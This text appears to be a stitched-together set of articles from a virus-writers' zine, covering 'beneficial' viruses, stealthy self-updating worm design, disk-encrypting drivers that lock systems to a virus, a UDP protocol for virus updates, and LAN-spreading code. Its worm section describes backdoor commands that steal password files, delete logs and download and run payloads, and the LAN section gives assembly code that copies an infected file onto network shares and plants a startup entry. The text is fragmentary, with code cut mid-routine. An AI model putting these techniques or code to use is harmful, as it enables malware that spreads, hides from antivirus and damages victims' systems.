share in the fun of designing viruses. And three, it sounds like a promising
technique to solve one of the nastiest security problems: patching, or
repairing computer vulnerabilities.
Right now, the best patching techniques involve a lot of negotiation and
manual labor -- which nobody enjoys very much, especially computer
technicians.
Beneficial viruses seem like a nice remedy: You turn a byzantine social
problem into a fun technical solution. You don't have to convince people to
install patches and system updates. You just use the technology to force them
to do what you want.
Therein lies the problem. Patching other people's machines without annoying
them is good; patching other people's machines without their consent is not.
Beneficial viruses are a simple solution that's always wrong. A virus is not
"bad" or "good" based on its payload. Viral propagation mechanisms are
inherently bad, and giving them beneficial payloads doesn't help. A virus
isn't a tool for any rational network administrator, regardless of intent.
All of this means that viruses are easy to get wrong and hard to recover
from. Once a virus starts spreading it's hard say what it will do. Some
viruses have been written to propagate harmlessly, but wreaked havoc --
ranging from crashed machines to clogged networks -- due to bugs in their
code. Some viruses were written to do damage and turned out to be
harmless, which is even more revealing.
Obviously, i can not discuss viruses are basically pernicious, but i can
not accept the remaining idea in those two articles: viruses are always
bad... they can not be used for good purposes.
VXers are always the bad buys of the movie... or maybe not... I can, and
i'll proof that a virus can be a good thing... maybe not legal, but ethical
and moral correct.
In the above text we find the key for the "good" virus... "A virus that
redirects the funds of the weapon manufacturers to the counts of the
humanitary organizations."
That sounds to Robin Hood: steal to the richs to give to the poors.
Robin Hood is considered a hero... The virus coder that writes such virus,
not only has reserved a place in the history books, he will be also
considered a hero.
As final thought i'ld like to say that the world is needing badly "good"
viruses.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Wormz in 21st century ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Thanx goez to ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
salo, the hacker from Slovakia for his article "DOYOULOVEME?" published in
hackerz zine Prielom. it inspired me and many thoughts in this article are
taken from there.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Introduction ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
still remember the ILOVEYOU worm? yeah, that famous bug that become most
wide-spreaded in the world and made the biggest "damages"... the spring 2000.
after the scandal one polish man Zalewski (well known from bugtraq security
conferension) decided to show ppl this virus ain't anything to fear of.
from bugtraq (sorry for not exact translation):
I fully agree with him. why is the world full of stupid macroviruses and vbs
wormz? 90% of all viruses has nothing new to show and they were coded by
cut&paste algorithm. do you believe this is the real danger for computer world?
we all would like to code some superb worm that could cause world-wide infection,
that could be able to spread very fast, that could stay undetectable for very
long time and enable access to infected computer for you, maybe with many more
features. well, why they exist so many lame wormz working still on the same
algorithm:
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Anathomy of "perfect worm" ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
yeah, also Zalewski knew that, and knew that long time before us. he wanted to
code some worm, REALLY dangerous one (and as he said, he did it). but hey,
dangerous does not mean destructive. dangerous means worm with dangerous spread
abilities. his worm was based on following 7 rulez:
A) portability: the worm must be independent on target the target
platform and must be able to work on various operating
systemz, not only on unix like systemz, but also dos/win.
B) invisibility: the worm must have implemented many anti-* and masking
featurez for hidding itself in target system and be able
to stay undetected as long time as possible.
D) learning abilities: the worm should be able to learn new exploit techniques
on the fly. by release of one updated worm all other
worm should be able to download newest version by special
communication channel (let's call it "wormnet").
A) portability will be probably big problem. it will be good to code such worm
in some HLL language - C will be the best solution, becoz it is supported on
almost every OS. you will need to use standard run-time libraries as much as
possibly. yeah, sometimez you will need to use some system-specific call, mainly
at pointz B) and F). but we code viruses/wormz for fun, not for making army
weapons, so I'm sure almost noone will bother with this point :)
B) what can be harder to code than some silly anti-* routines, you may think.
however, this is not so easy to code and not so unimportant as you think. sure,
you have to implement many anti-* featurez known from virus coding, thats clear.
but thats not all... imagine your worm is executed on some server and its
running for seven dayz and reguraly takes CPU's time, for seven dayz. when
administrator will open task manager, he will see that some strange process is
running for seven dayz - and that loox suspicious for sure. my advice is:
change process ID number and process name and mask the time the worm is running.
under Win95/98 it is very easy - you can use RegisterServiceProcess API that
can make the process invisible. under WinNT/2k the situation is harder - theres
no such API and its not possible to make the application invisible in the
system - hmm, only by hooking psapi.dll callz (EnumProcesses API, etc), but
this is a bit harder to code. i know one better method: copy worm file to
somewhere under another name (such as winlogon.exe, services.exe, crcss.exe -
if you will use the name of already running SERVICE, taskmanager won't be able
to terminate it!), execute it and terminate itself. by this way you will create
whole new process. it's very easy and efficent!
you might want to register your worm as a service application under WinNT/2k.
in this case just take a look at OpenSCManagerA and CreateServiceA APIz stored
in ADVAPI32.dll.
for such worm, it is very important to stay undetected as long time as possible.
it's better to delete the worm rather than get detected - I recommend you, if
your worm will "think" that he is detected (resident AV program detected,
debugger detected, task manager is opened etc..), immediatelly worm should
delete itself. how? under Win95 you can delete even already opened filez by
simple calling of DeleteFile(A/W) API. Under Win98/NT/2k its not possible. You
can call MoveFileEx API that allows you to delete already opened program after
next start of OS. But this call is not implemented under Win95/98 :( So, you
have to use smarter way... the possible way is to write to registry
HKLM\Software\Microsoft\Windows\\CurrentVersion\RunOnce %comspec% /C del
<path_to_worm\worm_file_name.exe> and reboot OS. This line should delete worm
in next start of OS.
C) this is very important stuff. if the user is at least a bit smart, he won't
open such message as "open attachment blah.exe, there is one very useful util".
it is also stupid way how to spread the worm. but how to spread the worm without
user interaction? do you know what is remote exploit? remote exploit is a
program that uses known bugz of the system/program to execute some code on
remote machine. I'm sure ya have already heard about it. Outlook Express
exploits are very well known - for instance, the <DATE> buffer overflow bug - if
the DATE item in mail message contains more than standard count of characterz,
the code placed after DATE item will be executed without any notification to
user. stupid, eh? but it worx. in Windowz there are thousandz and thousandz bug,
just open your inet browser and visit www.securityfocus.com - there is bugtraq,
conferension about security bugz - there you can find many informations about
known bugz and, that's also important, full working expoits.
the idea is to create updatable database of exploits that would be used for
machine attacks. not too easy, but also not too hard to code.
D) how will the worm be able to learn? hmm, the "learn" word is not correct.
in this case, "learn" = "be able to update itself to newer version". the worm
should, in the start of execution check, if there is any newer version of worm
on internet and if there is any, download it and update itself, which means
run the downloaded worm and delete itself.
E) but how will we update the worm? where will be the newer version placed?
what will be that communication channel? how to hide it? here comes some ideaz:
1) HTTP/FTP: the easiest method. you, as the author will place the updated
versions of wormz to some public internet site and from there
will wormz be able to download new versions. advantages: easy to
code (use WININET.DLL library), easy to update, easy to debug.
everything is easy in this case. disadvantages: easy to detect,
easy to clean (AVerz/police can contact provider to destroy that
site or they can simply add there some fake worm (e.g. cure)
and all wormz will clean themself). this method is not very good.
3) your own protocol: yep, code yer own communication protocol, with cypher
support (I recommend public key cyphering). How? I have
some ideaz in my head, but I won't explain them here,
that's yer work :) But believe me, it's not so hard to
code as it loox for the first time.
F) to make detection of yer worm harder, use polymorphism. Don't forget that
such poly engine should encode morph .code and .data sectionz aswell. My idea
is to construct poly worm this way:
- code it as backdoor: once the computer become infected, the worm will enable
you to access it. You will be able to send commandz (such as dir,
sendme c:\windows\admin.pwl, delete c:\*.log, etc...) and the worm will be able
to realise them.
- code it as soldier: the worm will know instructionz and will be based on them.
i know to wayz how to do that:
a) as a parameter you will pass the URL of some script file. worm will
download it and work on it. the script file may look like:
b) as a parameter you will pass the URL of some executable file. worm
will download it and execute it. that file will do the rest.
by using these featurez your worm can work as tool for hacking, as tool for file
transfering, as whatever you want. but don't forget to guarant that the worm
will accept only YOUR commands, or some childish lamer can abuse your worm.
this was a brief description of featurez which should the gewd worm have. ofcoz
you don't need to use such featurez as portability, it's only up to you :-)
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ The "Project XTC" ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
I believe the golden age of superb wormz will come. wormz before the 2000 year
are toys. let's show the world that the toys are not the only one sorta
programz we can code... the golden age will come soon...
if you would like to discuss with me this theme, feel free to mail me.
that's all folks!
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
# Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÉÄÄÍ[ How to make infected system to depend on the virus ]ÍÄÄ»
º ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ º
ÈÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍÍ[ by Prizzy/29A ]ÍÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍͼ
This article is intended for vx authors who want to equip their viruses
the method whereby the infected computer will be dependent on the virus.
In this case If an antivirus cleaned all infected files, the computer
would be inaccessible. And as we can assume no antivirus won't disinfect
files by special method.
Index
ÄÄÄÄÄ
1. The methods of the system's subjection
2. Files Encryption
2.1. Substandard File Access
3. Disk Encryption
3.1. Big Three in Action
3.2. DOS Driver
3.3. Win95/98/ME Driver
3.3.1. Loading the driver
3.3.2. What's inside?
3.3.3. How to load DOS driver
3.3.4. Dynamic Loading
3.4. WinNT/2k Driver
3.4.1. How to compile the driver
3.4.2. Driver Source
3.4.3. Disk Operations
3.4.4. How to load DOS & VXD driver
3.4.5. Driver loading
3.5. Debugging Drivers
4. Conclusion
2. Files Encryption
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It doesn't give to the virus full control under the computer. Even this
method is somehow limited. Every, for example, opening request from system
goes through the virus and it will do:
þ encrypt, let's say, of the first 2kb of the file
þ on every reading request the virus will decrypt those 2kb of the file
þ on the close request the viruss will encrypt back those 2kb
This method is realized in Win32.Crypto virus.
3. Disk Encryption
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It generally means a virus can gradually encrypt some parts of the disk,
usually it isn't good encrypt whole disk's data but just only some
sections (for example every tenth cluster etc). Thereby we reach of that,
the user won't recognize any slowing down of his system. I'd say this way
is programly more difficult than files encryption (mainly virus testing).
This method can be realize by drivers (for full Win32 system) or with the
virus without any drivers (only for WinNT and Win2000 system).
þ driver 'll immediately restore the old partition code from the buffer,
the destination offset is 0:7C00.
þ hook 0x13 service and then go back
The best way how to load static VXD is copy its to the SYSTEM\IOSUBSYS di-
rectory and after next restart Windows will automatically upload registers
itself.
If you want to load VXD immediately you must call following code:
VxDName db "\\.\driver.vxd",0
hVxD dd ?
.386p
include vmm.inc
include vwin32.inc
Begin_control_dispatch DRIVER
Control_Dispatch Device_Init, OnDeviceIoControl
End_control_dispatch DRIVER
EndProc OnDeviceIoControl
That's all for now. Just we hooked one VMM function: IOS_SendCommand, in
SC_Hook function we will catch all system access through ring0.
BeginProc SC_Hook
; this service has the same params like IOS_SendCommand func.
; esi ... IOR structure \ more in DDK 98
; edi ... DCB structure /
pusha
cmp byte ptr [sc_already_inside],0 ;re-call ?
jnz sc_exit
mov byte ptr [sc_already_inside],1
; own algorithm
...
...
There're two ways of rerturning to the host either returning status code
or by callbacks. I remember when I was coding VXD driver I had some
problems with callbacks so I will do the best you wouldn't stay in dark.
OR
; set the callback
mov esi,[sc_ior_address] ;get IOR structure address
mov eax,[esi].IOR_callback ;get old callback address
mov [esi].IOR_callback,offset sc_callback
mov [sc_old_callback],eax
popa
jmp [sc_orig_funct] ;call IOS_SendCommand
sc_callback:
pusha
...
popa
cmp [sc_old_callback],0 ;is there any old cback. ?
jz sc_wn_exit_ret
jmp [sc_old_callback] ;yeah, jump there
sc_wn_exit_ret:
ret ;no callback
#include <ntddk.h>
#include "driver.h"
// The name of the driver which we will hook, in SoftICE you can
// write "DEVICE" or "DRIVER" to look at those. Mark "%d" means the
// number of physical disk device (0 = C: drive)
#define DiskDeviceName "\\Device\\HardDisk%d"
#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT,DriverEntry)
#endif
devExt = hookDevice->DeviceExtension;
devExt->DeviceObject=hookDevice;
devExt->DriverObject=DriverObject;
return STATUS_SUCCESS;
PIO_STACK_LOCATION currentIrpStack;
PIO_STACK_LOCATION nextIrpStack;
PDEVICE_EXTENSION devExt = DeviceObject->DeviceExtension;
IO_STATUS_BLOCK IoStatus;
// Now check the range of encryption and find out if you must
// decode read request or not.
...
Now we have two ways go back, normal through return value or we can use
callback.
OR
IoSetCompletionRoutine(Irp,
DiskReadCompletion,
DeviceObject,
TRUE,
TRUE,
TRUE);
PIO_STACK_LOCATION IrpSp;
PDEVICE_EXTENSION devExt = DeviceObject->DeviceExtension;
return STATUS_SUCCESS;
if (IoCallDriver(devExt->attachedDevice, localIrp)
== STATUS_PENDING)
KeWaitForSingleObject(&event,
Suspended,
KernelMode,
FALSE,
NULL);
return NT_SUCCESS(IoStatus.Status);
...
offset.HighPart = offset.LowPart = 0;
// Set an event.
KeInitializeEvent(&event,
NotificationEvent,
FALSE);
return localIrp->IoStatus.Status;
if (hPhysicalDrive != INVALID_HANDLE_VALUE)
{
MBR data;
DWORD dwBytesRead;
...
}
þ To use driver: you can dynamic load the driver (more below) and it'll
use IoBuildSynchronousFsdRequest to read/write it. This manner is bet-
ter because you can't know if the user is an administartor.
So, we successfuly loaded the DOS driver and now we must do the same for
VXD driver. This is easier but we must know if the user 's Win95/98 system
or not. We have two ways to find it out:
þ Compare typical Win9x directories, like:
C:\Windows, C:\Win95 or Win98 etc...
þ Create a thread which will search the disk step by step.
"ImageePath" ,REG_EXPAND_SZ,"Systeem32\DRIVERS\driver.sys"
"Description" ,REG_SZ ,"The virus NT/2k driver."
"DisplayName" ,REG_SZ ,"VX_SYS"
"ErrorControl",REG_DWORD ,1
"Start" ,REG_DWORD ,1 ;boot loading
"Type" ,REG_DWORD ,1 ;kernel driver
.386
.model flat,stdcall
includelib c:\...\advapi32.lib
extrn OpenSCManagerA:proc
extrn CreateServiceA:proc
extrn GetCurrentDirectoryA:proc
extrn lstrcat:proc
extrn CloseServiceHandle:proc
extrn StartServiceA:proc
extrn DeleteService:proc
.data
DosDeviceName db "\\.\"
DriverName db "driver.sys",0
_ServiceExe db "\driver.sys",0
.data?
schSCManager dd ?
schService dd ?
...
push 0
call ExitProcess
end start
Some rich vxers who have two computers can use the 2nd one like a
debugger, the exact instruction is in DDK 2k. You will need create only a
serial cabel (show us your electrotechnic knowledge!).
4. Conclusion
ÄÄÄÄÄÄÄÄÄÄÄÄÄ
If I had possibility to write a virus sometimes in future, surely I would
choose this method like 100%-ly attack againt antiviruses. For some vxers
it can be hard to code but mainly "Files Encryption" would be easy to rea-
lize. In fine I wish you could instead all anti-* technics to use one qui-
te certain way leading to the antiviruses paralysis.
25th-26th November 2000, the Czech Republic
Prizzy/29A
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
NetWork Distributed Viruses
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
by Bumblebee/29A
Introduction
ÄÄÄÄÄÄÄÄÄÄÄÄ
But i think could be made that the virus updates itself from a more
advanced virus. Of coz for this issue we need to define at least, and
may be not at last, two protocols: for network communication and an
interface for updating.
Network Protocol
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The idea i have in mind is that a virus can be server or client. The
way the virus acts depends on some noise to avoid more than one server
on the same sub-network. For the idea i want to use UDP protocol that
is simple to manage and coz we're coding a virus no matter of packet
loss :)
Some defines:
Let's begin!
Initial state: E0
It may seem a bit complex, but it isn't! It has a non efficient way
in data terms to manage network errors, that's UDP packes loss. But it
is easy to code without annoying ACK's and NACK's going up and down the
wire.
What the hell we get with this protocol? We have a different servers
in different sessions (and may be in the same session hehe ;) And the
best is that sysadmin only knows the server IP, that's only one machine
infected. To get the others you must wait to another virus to become
server and this will took WAITTIME+RANDOM (random noise to avoid two
or more servers running at time... but is not needed and really doesn't
works very fine if machines swich on in a random way). Of coz avers can
code a fake server... but sure this is annoying for them, isn't it?
Battlefield
ÄÄÄÄÄÄÄÄÄÄÄ
May be you (lo reader!) are a bit lost with my M.E.F. so i'm going to
write here an example of protocol working:
As you can see it's not as complex as it seems. It's hard to get it
at first time but soon you will start to think adding more things to
it :)
From theory side that's all folks. But let's walk a bit into a simple
implementation.
UDP sockets are not blocking. But it means too that you're not sure
packets arrives. As i say before don't care. We are coding a virus and
moreover UDP are quite secure at local networks (the machines in the
same ISP than you when you're connected to internet are very nice to
receive those packets). And more than one server is not bad after all
coz each client will use ONLY ONE server. The worst case will be 'n'
viruses and 'n' servers, that's no communication!
Implementin server-to-server communication it's very hard, forgive it!
That's enought by now. If you want you can send me your ideas and
comments. Let's start our own RFC! hehe
Last turn off the lights
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
I hope you're not thinkin: 'I'm lost. It really will update a virus?'
The idea is you add to your updatable virus a new module and the you
can spread it to see how it updates your other samples out there. At
leat next generations will be updated :) That improves the machine-to-
machine uptade approach using networks. And don't rely in web address
anymore!
Another point is you can use this distributed system for other things
like the payload. What happens if the server triggers a SHUTDOWN mess?
Just imagine several machines closing windows at the same time... it
is not a wonderful world?
ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Foreword ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
Hello, ppl!! Here I come with another tutorial that I hope will help
you discover the world of local network infection. This idea is quite old,
but, as you all know me, I like to take a share of exposing even older ideas
in the best way I can think of.
The questions which raise here are quite forthcoming: what is a local
network, why do we need to infect the local network? First question will be
answered further, but the second one is suitable for a foreword, wouldn't
you say so?
So, besides the home computers, where do most computers exist? I will
tell you: in offices, in internet-cafes and in exhibitions. And these are
places where computers NEED to be linked into a network. An office is a
tipical place were people need to share computer resources in order to be
more efficent. It's a tipical place where data needs to be stored on secured
servers that are able to backup data so that if one workstation fails
nothing gets lost. It's a tipical place where people have shared folders on
the server and exchange excel spreadsheets and word documents. The same
thing applies for internet cafes. Here, moreso computers are linked into a
network and people run executable files, most of them games, irc and email
clients. Let us not forget also the school and college computer labs, where
students come to learn the magic world of programming...
But, I repeat, how the virus breaks free out of the local network is
not our main concern here. Our problem is how can we spread our code into
the local network increasing the probability that it will get out of there,
or it will be kept for years on the backup tapes... Which is also a pretty
neat thing to happen...
ÚÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Credits ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÙ
Let me not forget first of all to mention all the guys that inspired
me in the lan infection through their work and articles! My 29A mates and
all the rest that used the following technique!
ÚÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Basics ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Local network - hardware ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
It's not really our bussines to discuss the hardware of the local
network, but I will just mention a few words here. Usually, in a local
network we have a server. This is basically a normal computer, but with very
high resources (huge and fast harddisks, huge RAM memory, etc). The server
is linked to a hub. The hub is just a small device that has a defined number
of sockets, which gives the number of resources (other compters or
devices) that can be connected to the server. If the network is also on
line, one of the sockets is taken by a router, or by another compter that
acts like a firewall. All of the remaining sockets have wires that go
directly to the other computers (workstations). The workstations have the
wires connected into the network board in the back (it has to have 2 lights,
one always on, and one flashing as info goes through the network). More or
less, this is everything you will ever need to know about LANs, if you are
not going to become a network administrator... So, let's move forward to the
software part...
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Local network - soft representation ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
As one might expect, the local network can be accessed either using
the "My Computer" icon, or the "Network neighbourhood". There you can see
all the computers that are currently connected into the network. You can
double click on them and see what is shared (whatever is shared has a small
hand drawn over the icon). Most of the time you will only have a printer or
other external device shared, but sometimes you can find the entire harddisk
of the remote computer shared. Basically you can access the shared drives as
if they are folders on your own workstation and this is what the LAN
spreading viruses will try to use. Depending on the security level of the
network, the resources might be protected by individual passwords or not.
Root of network
³
ÚÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Container1 Resource2 Container2
³ ³
³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Resource6 Resource3 Container3
³
ÃÄÄÄÄÄÄÄÄÄÄÄÄ¿
Resource4 Resource5
So, not only that it looks like a harddisk file system, it is exactly
like a file system. So, a container is resource that has other resources in
it, and a final resource has no other branches. Simplified, a resource can
be a printer or another disk (hdd, floppy, cd, etc). This is, again,
presented very briefly, only the basic things that we need to infect the
lan.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Microsoft's LAN standard ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The MPR library is the library that you need in order to be able to
roam the LAN. The file is called MPR.DLL and can be found in the system
directory (SYSTEM or SYSTEM32). Your program must first load this library
and get the addresses of the needed functions before it can attempt to
access the LAN. There's nothing special about that, just use the LoadLibrary
API and load it like any other library.
WNetOpenEnumA
WNetEnumResourceA
WNetTCloseEnum
Unbelievable, huh? Only three apis and we can do all that? Well, you
will see that it is a little tricky to program these apis, because you must
use reentrant procedures that save data on stack, you need to allocate and
free memory, but this will come just a little bit later on. First let's
breakdown these apis:
Where:
dwUsage - what is the usage of this resource? The value might be one
of the following:
Ok, this structure is very important for us. As you will see we shall
have to browse the network as if we were browsing the files on a HDD and
this structure will give us all the needed information. But to do this,
first we have to open an enumeration handle. This is done with this
function:
WNetOpenEnumA(
IN DWORD dwScope,
IN DWORD dwType,
IN DWORD dwUsage,
IN LPNETRESOURCEA lpNetResource,
OUT LPHANDLE lphEnum
);
So, you must tell the system, what scope, what type and what usage
type of resource are you looking for, you must provide a pointer to a
NETRESOURCE structure to be filled in and it will return to you the handle
to the enumeration. Usually when you first use this structure you begin with
a NULL parameter for the lpNetResource which means the entire network is to
be browsed. After you have opened the enumeration, you must start
enumerating resources:
WNetEnumResourceA(
IN HANDLE hEnum,
IN OUT LPDWORD lpcCount,
OUT LPVOID lpBuffer,
IN OUT LPDWORD lpBufferSize
);
lpcCount - how many entries do you want to see? Usually you input here
a big number like 0FFFFFFFFh and all entries are processed. The function
will return in this field the actual number of resources that were found.
WNetCloseEnum(
IN HANDLE hEnum
);
Ok, this was a little briefing on the apis we can use. Let's go
deeper and see some code that will make you understand even better how this
is done.
ÚÄÄÄÄÄÄ¿
ÚÙ À¿
³ Code ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÙ
First of all, I do hope that all of you are familiar with the concept
of local labels. This concept is widely used by all high level languages and
it means that you may have variables that have their value stored directly
on the stack and everytime that procedure is called a new room is created on
the stack to hold the variables. This is why you can recurse procedures
(make one procedure call itself) without losing the variables values,
because they are stored on the stack and the stack goes back and forth as
you call or return from procedure. One very important issue here is that
when you define such a procedure the common way it will result will be more
or less like this:
enter 0008, 00
mov eax, [ebp+0ch]
mov edx, [ebp-04h]
leave
ret
So, you see, you cannot rely on using EBP as a delta handle because
the compiler automaticaly generates instructions that use EBP for other
purposes. So, you must get your delta handle in ANOTHER register than EBP!
Also, remember NOT to use the delta handle for the local variables, e.g. if
you have the delta into ESI DO NOT EVER say:
Ok, this being said, let us start defining our network infection
procedure. Basically what we will do, we will create an enumeration for the
root of the network, and then for each resource which is a container we will
open another enumeration and so on until we finish all entries. For each
resource which is a disk, we will try to retrieve its name and infect it:
where:
lpnr = the address of the network enumeration on entry
lpnrLocal = the address of the enumeration passed as a parameter
hEnum = a handle to the enumeration
ceEntries = how many entries in the enumeration
cbBuffer = a buffer to hold enumeration data
And now let's initialize our local variables and try to open the
enumeration:
Now we have the enumeration handle and we have the available memory
to fill the data in... All we have left to do is enumerate the resources:
enumerate: ;
lea eax, cbBuffer ;enumerate all the
push eax ;resources
mov esi, [lpnrLocal] ;where is our memory?
push esi ;
lea eax, ceEntries ;how many entries?
push eax ;
push hEnum ;our enumeration handle
call [edx+_WNetEnumResourceA] ;
;
or eax, eax ;failed?
jnz free_mem ;
Ok, now, if we are here that means that our enumeration was also
succesful. The number of entries in this resource tree comes into our local
variable ceEntries. All we need to do is take that into a counter and loop
around:
Now, if we have a container, than it means that that one itself might
have some other resources inside, so we can recurse this procedure by
pushing on stack the ESI register which holds the address of this resource's
memory area:
push esi ;
call NetInfection ;recurse!!
When there is no other tree branch for the current resource we simply
continue looking up the rest of the resources. For this we increase ESI with
20h which is the size of the network structure and we loop:
get_next_entry: ;
add esi, 20h ;next resource!
pop ecx ;
loop roam_net ;
;
jmp enumerate ;and next enumeration...
free_mem: ;
call [edx+_GlobalFree], [lpnrLocal] ;free the memory
call [edx+_WNetCloseEnum], [hEnum] ;and close enumeration.
;
exit_net: ;
popa ;
ret ;
NetInfection endp ;
You saw that above I made some checkings: if the name of the remote
resource is valid or if it is a floppy disk than no infection occures,
otherwise we call our Remote Infection procedure. Let me tell you that here
one can do whatever comes into his mind... I mean, ESI holds the name of the
remote computer. What more do you need? I will give you one of the many ways
you can use, one which appeared in more viruses and which proves to be
reliable enough. It's main idea is that if you are connected to another
computer that has a Windows system on it, for sure there will exist there a
folder that will contain the Windows directory... And in the windows
directory we have the good old Win.Ini file which is still kept as a
backward compatibility. Of course we know that almost all windows
directories are called Windows, Win98, Win95, WinNT, and stuff like that.
What you could do is get the windows directory on the local workstation and
assume that as long as the computers are connected into a network the
Windows was installed in the same way so the directory will be the same. But
for the moment the method of testing various directories is pretty good (was
used by Gryio in Cholera). So what you need to do is create some strings
like this:
<remote name>\Windows\win.ini
<remote name>\WinNT\win.ini
<remote name>\Win95\win.ini
<remote name>\Win98\win.ini
And check if you can open the win.ini file. If you can it means you
found it!
The next step is to copy the currently running file over the net into
the windows directory. That is very easy using CopyFileA. After that you
need to create an entry in the win.ini file to read like this:
And the file file.exe is the infected victim from the local computer
but under another name. At the next reboot the win.ini file will launch the
file called file.exe and guess what: the entire windows directory will get
infected. For the user it will look kinda strange why some application
automatically started running after reboot but... he will not have anything
to do about it. And that's because your virus must be equiped with a cool
feature (which appeares in Rammstein). Any infected victim must check in the
windows directory and if it finds the file file.exe there and no entry in
the win.ini file, or if there is an entry and there is no file, than it must
delete the file and the entry, so there will be no trace of the traspassing
files.
Let's see step by step how we can achieve what I explained here:
First of all we will save all the registers and we can take back the
delta handle into the EBP register because in this procedure we do not mess
with the stack in anyway:
;
RemoteInfection proc ;
pusha ;
call @___1 ;restore the delta handle
@___1: ;
pop ebp ;
sub ebp, offset @___1 ;
Next we need to get the name of the running file itself (the infected
file), so that we can copy it over the net:
push 260 ;get the current file
lea eax, [ebp+myname] ;name
push eax ;
push 0 ;
call [ebp+_GetModuleFileNameA] ;
or eax, eax ;
jz cannot_roam ;
Now we will point the various possible Windows dir names and create
the name of the dropper and the name of the win.ini file.
droppername = "C:\Windows\file.exe"
winininame = "C:\Windows\win.ini"
myname = "C:\Windows\calc.exe"
Now, let's copy the myname file into the droppername file:
;
push TRUE ;now copy ourself over
push ebx ;the LAN under the new
lea eax, [ebp+myname] ;name into the remote
push eax ;windows directory
call [ebp+_CopyFileA] ;
or eax, eax ;
jz test_next ;
Of course, if the dir name "Windows" was not good, our procedure has
to continue searching for the rest of the windows dir names:
test_next: ;
@endsz ;go and try the next
cmp byte ptr [esi], 0fh ;windows path!
jne test_paths ;
;
cannot_roam: ;
popa ;
ret ;
windirs db "\Windows", 0 ;
db "\WinNT" , 0 ;
db "\Win" , 0 ;
db "\Win95" , 0 ;
db "\Win98" , 0 ;
db 0fh ;
;
winini db "\Win.ini" , 0 ;
drop db "\file.exe", 0 ;
cmd db "run" , 0 ;
;
myname db 260 dup(0) ;
droppername db 260 dup(0) ;
winininame db 260 dup(0) ;
RemoteInfection endp ;
That was it!!! It is almost unbeliveable how small the code is and
yet how powerful it is... Of course, for a better success you should combine
the above procedure with some patching code and some hacking code. This is
needed because in the raw form I presented, the code will fail if the
network is protected with passwords or if no resource is shared. So, you
would need to patch some files to get admin rights, but this is not what I
speak about in this article...
I hope this was clear enough, and I expect you to write me back if
you were able to use this or if you discovered other ways more interesting,
more powerful, more reliable... I wait for your e-mails on my address:
lordjulus@geocities.com.
ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÚÙ À¿
³ Final word ³
À¿ ÚÙ
ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Introduction ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
it's a long time when the first viruses became memory resident. while the time
passed we, virus coderz, found new wayz how to become memory resident under
Windows platformz. under Win95/98 it was very easy to jump to Ring-0, hook all
